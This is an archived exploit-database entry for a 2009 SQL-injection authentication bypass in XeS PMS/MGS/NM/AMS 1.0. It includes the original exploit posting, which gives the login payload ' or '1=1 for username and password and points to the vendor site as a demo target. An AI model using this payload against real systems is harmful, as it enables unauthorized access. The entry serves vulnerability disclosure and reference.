XeS PMS/MGS/NM/AMS 1.0 (Auth Bypass) Remote Sql Injection

vendor:

XeS PMS/MGS/NM/AMS

by:

Dr-HTmL

CVSS

HIGH

SQL Injection

CWE

Product Name: XeS PMS/MGS/NM/AMS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:xenginesoft:xes_pms/mgs/nm/ams:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

XeS PMS/MGS/NM/AMS 1.0 (Auth Bypass) Remote Sql Injection

XeS PMS/MGS/NM/AMS 1.0 is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability to gain access to the application without authentication. This can be done by supplying a specially crafted username and password to the application. The username and password should be set to ' or '1=1.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

-----------------------------------------------------Iam MusLiM-----------------------------------
 

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                           
==============================================================================
XeS PMS/MGS/NM/AMS 1.0  (Auth Bypass) Remote Sql Injection
-----------------------------------------------------
Founder: Dr-HTmL
Home: www.h4ckf0ru.com
Vive Algerie
# HOME :http://www.xenginesoft.com

Note : Hadi Bedaya Wa Mazal Mazal
mail: Dark.Dz[at]hotmail[dot]fr
-----------------------------------------------------------
-----------------------------------------------------------
DD)
---
Username: ' or '1=1
Password: ' or '1=1
-----------------------------------------------
demo:
----
http://www.xenginesoft.com/
------------------------------------------------------
Thanx  :
           ThE g0bL!N (My best Friend) - M0nSt3r-Dz - Mast3r_Fin@L -  Super Cristal - Hcoca_Man - Dreadful 
           Yassine_Enp - ViRuS_HaCkEr_Dz-   Mr.JOoMJOoM  -  Naili-  kader-Dz    Tryag-TeaM 
	   Str0ke - Milw0rm.com
------------------------------------------------------------------------------------
www.h4ckf0ru.com/vb/
------------------------------------------------------------------------------------

# milw0rm.com [2009-04-13]